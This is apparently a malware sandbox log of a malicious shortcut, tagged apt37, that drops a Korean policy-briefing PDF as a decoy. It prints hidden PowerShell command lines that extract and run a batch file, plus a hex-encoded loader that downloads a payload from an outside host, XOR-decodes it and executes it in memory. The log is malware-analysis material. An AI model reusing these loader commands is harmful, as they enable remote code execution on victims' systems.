stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf
file c:\Users\test22\AppData\Local\Temp\ojtnpej4.dll
file c:\Users\test22\AppData\Local\Temp\hawz4wth.dll
file c:\Users\test22\AppData\Local\Temp\8ax4pzbz.dll
file c:\Users\test22\AppData\Local\Temp\td2iyjiy.dll
file c:\Users\test22\AppData\Local\Temp\mimxjfes.dll
file c:\Users\test22\AppData\Local\Temp\v-jjopqs.dll
file c:\Users\test22\AppData\Local\Temp\pfywdxbj.dll
file C:\Users\test22\AppData\Local\Temp\PMTRD.bat
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\Users\test22\AppData\Local\Temp\apt37.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
cmdline powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
cmdline C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
cmdline powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
file C:\Users\test22\AppData\Local\Temp\mimxjfes.dll
file C:\Users\test22\AppData\Local\Temp\ojtnpej4.dll
file C:\Users\test22\AppData\Local\Temp\td2iyjiy.dll
file C:\Users\test22\AppData\Local\Temp\8ax4pzbz.dll
file C:\Users\test22\AppData\Local\Temp\v-jjopqs.dll
file C:\Users\test22\AppData\Local\Temp\hawz4wth.dll
file C:\Users\test22\AppData\Local\Temp\pfywdxbj.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2212
thread_handle: 0x00000338
process_identifier: 2216
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000340
1 1 0

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x00000084
process_identifier: 2260
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

 thread_identifier: 2792
thread_handle: 0x00000088
process_identifier: 2804
current_directory:
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
